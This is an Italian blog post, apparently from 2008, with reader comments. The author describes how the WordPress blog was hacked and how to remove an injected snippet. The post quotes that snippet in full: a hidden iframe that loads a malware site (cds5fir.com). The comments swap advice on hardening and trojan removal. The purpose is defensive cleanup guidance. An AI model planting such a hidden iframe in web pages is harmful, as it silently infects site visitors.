Grazie ad una segnalazione di un lettore di blographik, ho scoperto mio malgrado che nell’intera giornata di ieri, questo blog è stato violato da qualche “simpatico burlone”, ed è diventato portatore sano di un troian (che tra l’altro ho preso anch’io nel mio portatile). In questo articolo ti segnalo come risolvere il problema se sei incappato anche tu in questo problema.
Ecco l’email di un lettore che mi segnala:
Chiedo venia nel caso mi sbagli, ma c’è un iframe nascosto nel tuo sito che potrebbe caricare nel computer del visitatore un virus. O il mio antivirus è troppo premuroso o qualcuno ha violato il tuo sistema aggiungendo prima del tag </body> un richiamo al sito cds5fir.com.
Se notate dei rallentamenti nell’aprire firefox o altri programmi probabilmente avete anche voi questo simpatico amico nel vostro pc.
A te blogger consiglio…
Per evitare che questo virus si doffonda, ho cercato di trovare la stringa di codice nei file di blographik che mi portassero ad eliminare il problema.
Ho trovato la funzione in php che creava un iframe nascosto, ecco come puoi risolvere anche tu il problema:
01. vai sulla index.php del tuo blog su piattaforma wordpress;
02. cerca la seguente stringa:
<div style="visibility:hidden"><iframe src="http://cds5fir.com/ld/grb/" width=100 height=80></iframe></div>
03. Eliminala ed aggiorna il file sul server dove è presente il tuo blog.
04. Nel caso non l’avessi già fatto, aggiorna wordpress alle versione 2.5, che dovrebbe risolvere anche qualche falla di sicurezza delle versioni precedenti.
Se non sei un esperto, ti consiglio di seguire passo passo lo screencast di Andrea Beggi sull’aggiornamento ad una nuova versione di wordpress.
Ai seguenti link puoi avere maggiori informazioni:
http://www.juzaforum.com/forum/viewtopic.php?f=10&t=44420
http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/
Abbonati al Feed Rss
Iscriviti alla Newsletter
Blographik è un progetto dedicato in larga parte a web design, grafica e risorse per blog. Nasce nel Gennaio del 2006 con lo scopo di seguire i continui sviluppi del blogging e del web design cercando di proporre sempre materiale ed informazioni utili per tutti i professionisti e gli appassionati del settore.
11 Commenti
Attento che anche la 2.5 è buggata. Che versione di WordPress avevi prima di aggiornare?
Ciao,
Emanuele
Bel casino quando ti forano il sito
Anche nel mio blog era stato inserito del codice maligno, che faceva apparire messaggi spam sopra la testata del blog caricati direttamente tramite feed rss, con tanto di scritture nel database. Non sai che casino pulire tutto. Eppure WordPress non c’entrava niente. Il bug era da ricercare nell’hosting e visto che non è stato risolto ho aggirato il problema modificando e blindando tutti i chmod delle cartelle di wordpress (rinunciando alla possibilità di modificare il tema ed i plugin direttamente da pannello di controllo).
@Emanuele: grazie per la dritta. Hai ragione riguardo alla versione baggata della versione 2.5 ma con l’intrusione di questo tizio era l’unica cosa da fare per bloccarlo.
la vecchia versione che avevo doveva essere la 2.2/.3 o qualcosa del genere, non ricordo di preciso.
Hai qualche consiglio da segnalare a me ed ai lettori di questo blog che potrebbe essere utile a tutti noi blogger?
Grazie
.
@Andrea: grazie per l’appoggio morale, effettivamente non mi era mai successo e ti assicuro che non è una cosa piacevole
.
@Maxime: Molto interessante la tua contromossa.
Nel mio caso non è detto che non sia stato un problema del servizio di hosting.
Effettivamente non è male l’idea di bloccare tutti gli accessi tramite chmod.
.
Grazie per aver condiviso con me ed i lettori di questo blog la tua esperienza
Tempo fa scrissi un articolo in tal senso su come rendere wordpress sicuro.
@David: ti ringrazio molto per aver condiviso con me e gli altri questo tuo interessante articolo. Lo leggerò con molta attenzione per controllare cosa posso migliorare per diminuire gli attacchi esterni.
Visto la tua esperienza come sistemista (consiglio a tutti di visitare il blog di David), hai qualche suggerimento per coloro che come me, ora hanno questo trojan nella propria macchina e non riesce ad eliminarlo?
Fin’ora ho provato molti software antispyware e anti trojan ma l’infezione non è stata debellata
.
Cosa consigli per chi lavora su windows xp?
Fin’ora ho scansionato il mio portatile con Spybot e Malware Cleaner in modalità provvisoria, ma non sono riuscito a trovare il trojan.
Cosa suggerisci?
Grazie in anticipo per l’aiuto.
Purtroppo fa parte della categoria virus e non spyware. Quindi se non si riesce a debellare la bestiaccia lo si deve ad un antivirus inefficace e non all’antispyware.
In aggiunta sembra che sia un rootkit, il cui scopo è quello di celarsi agli occhi dell’utilizzatore e lavorare in segreto andando a modificare persino l’antivirus. Purtroppo non so se è questo il caso.
Consiglio di scaricarsi un antirootkit, sul mio sito ne riporto un elenco nutrito, e un buon antivirus. Provate inoltre PrevixCSI.
Personalmente io ho come antivirus Nod32 [a pagamento o in versione trial per 15 giorni]. Altri validi sono Kaspersky[pagamento] e Antivir [gratuito] ma non so se sono in grado di rilevare questa specifica minaccia.
@David; grazie per i consigli. Infatti nel mio portatile ho antivir come antivirus, ma purtroppo il virus non è stato trovato. Ho provato con più scansioni ma niente da fare!!
Intuisco anch’io che quessto virus maligno mi prelevi password e dati personali da utilizzare per fini non certo leciti, per ora sono ancora iun alto mare. PRoverò a leggere con attenzione il tuo articolo, e vedere se riesco a risolvere questo problema.
Grazie per il tuo contributo.
A presto.
Prova una scansione anche con Avast!, c’é la versione gratuita, è leggero e svolge un buon lavoro… ne esiste una versione anche per Linux anche se poco utilizzata.
Però se è difficile da individuare, e ti auguro che non sia un rootkit, l’eseguibile è stato compresso molto bene tanto da sfuggire all’analisi tipica degli antivirus… dovresti tenere d’occhio i processi caricati all’avvio magari spunta fuori qualche dettaglio.
Brutta faccenda comunque.
.:.
@hermansji: ti ringrazio molto per i tuoi utili suggerimenti. Installerò anche Avast e vediamo se trova qualcosa.
Nel caso peggiore, andrò sul pesante con una bella formattazione
.
2 Trackbacks
15 aprile 2008 alle 19:47
[...] post nel quale Mik racconta di un problema di sicurezza avuto sul suo blog, mi ha fatto ricordare che qualche tempo fa [...]
27 novembre 2008 alle 15:40
[...] il nome utente predefinito, in quanto è molto più facile riuscire poi ad entrare e fare danni, come già mi è successo in passato. Quindi una volta che hai avuto accesso per la prima volta al tuo pannello di controllo, vai [...]